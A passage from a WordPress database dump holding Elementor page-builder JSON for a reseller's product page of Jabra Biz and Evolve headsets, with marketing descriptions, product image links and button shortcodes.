]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f72a8b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8703933\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2873 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\\\" alt=\\\"\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7f07070\",\"elType\":\"section\",\"settings\":{\"structure\":\"34\"},\"elements\":[{\"id\":\"7909a7f\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5bb3037\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"349a8fd\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/85RJqPjfjng\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"a7a7db0\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1a4e97\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a4c36b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b09d5f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a83600\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"6a528d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"21f7fb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2877 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\\\" alt=\\\"\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0869d9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bec7706\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300<\\/strong><\\/h2><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8f9ee62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"27b34fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b9598c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300 QD<\\/strong><\\/h2><p>Jabra Biz\\u2122 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35b2553\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4047bd4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2876 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD.png\\\" alt=\\\"\\\" width=\\\"186\\\" height=\\\"186\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"175e85c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"519e230\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6bfb90c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2877 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\\\" alt=\\\"\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9e4889b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b26b188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"solution-group-card__product-name ng-binding\\\" style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300 QD DUO<\\/strong><\\/h2><p>Jabra Biz\\u2122 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ec1e2e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7187165\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8d1d85b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 1500<\\/strong><\\/h2><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b92f5f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6008c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2879 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_QD.png\\\" alt=\\\"\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e34ebbb\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"48b05fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cb3f7ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\"><img class=\\\" wp-image-2878 alignnone\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_USB.png\\\" alt=\\\"\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73b78bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a82801\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 1500 DUO USB<\\/strong><\\/h2><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a829b4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3b4834e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b38b08e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e8e065f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7b07964\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8533,3649,'_wp_page_template','template-fullwidth.php'),(8534,3649,'_elementor_edit_mode','builder'),(8535,3649,'_elementor_template_type','post'),(8536,3649,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1 style=\\\"text-align: center;\\\"><strong>Jabra<\\/strong><\\/h1><h3 style=\\\"text-align: center;\\\">Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"03\",\"right\":\"03\",\"bottom\":\"03\",\"left\":\"03\",\"isLinked\":true},\"border_color\":\"#e2e2e2\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.919,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.081,\"margin\":{\"unit\":\"px\",\"top\":\"43\",\"right\":\"43\",\"bottom\":\"43\",\"left\":\"43\",\"isLinked\":true}},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"337d102\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1b419c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b34a6f3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0bd36e0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#61ce70\"},\"elements\":[{\"id\":\"a4417e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":66.577},\"elements\":[{\"id\":\"e600588\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65t<\\/strong><\\/h2><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9e39b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":33.423},\"elements\":[{\"id\":\"2bba2f8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone wp-image-2852 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\\\" alt=\\\"\\\" width=\\\"163\\\" height=\\\"163\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#efefef\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":0,\"bottom\":\"12\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"background_color\":\"#f9f9f9\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65t<\\/strong><\\/h2><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\",\"_background_background\":\"classic\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"54e8d0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone wp-image-2852 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\\\" alt=\\\"\\\" width=\\\"163\\\" height=\\\"163\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"93ab181\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2853 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\\\" alt=\\\"\\\" width=\\\"203\\\" height=\\\"203\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 80<\\/strong><\\/h2><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 75e<\\/strong><\\/h2><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"93f376b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2854 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f104529\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2855 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\\\" alt=\\\"\\\" width=\\\"201\\\" height=\\\"201\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"ng-binding ng-scope\\\" style=\\\"text-align: center;\\\"><strong>Jabra Evolve 75<\\/strong><\\/h2><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"89a0b3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2856 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\\\" alt=\\\"\\\" width=\\\"203\\\" height=\\\"203\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"434120f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2857 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\\\" alt=\\\"\\\" width=\\\"209\\\" height=\\\"209\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 40 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 30 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e63500c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2859 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\\\" alt=\\\"\\\" width=\\\"200\\\" height=\\\"200\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3f45227\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2859 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\\\" alt=\\\"\\\" width=\\\"216\\\" height=\\\"216\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 20 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"801e577\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"9929e95\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ff8dfcd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 20 SE<\\/strong><\\/h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f15601\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ef4be63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2867 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20_SE_Mono.png\\\" alt=\\\"\\\" width=\\\"204\\\" height=\\\"204\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5a94b95\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca1cdef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1a49967\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2870 aligncenter\\\" 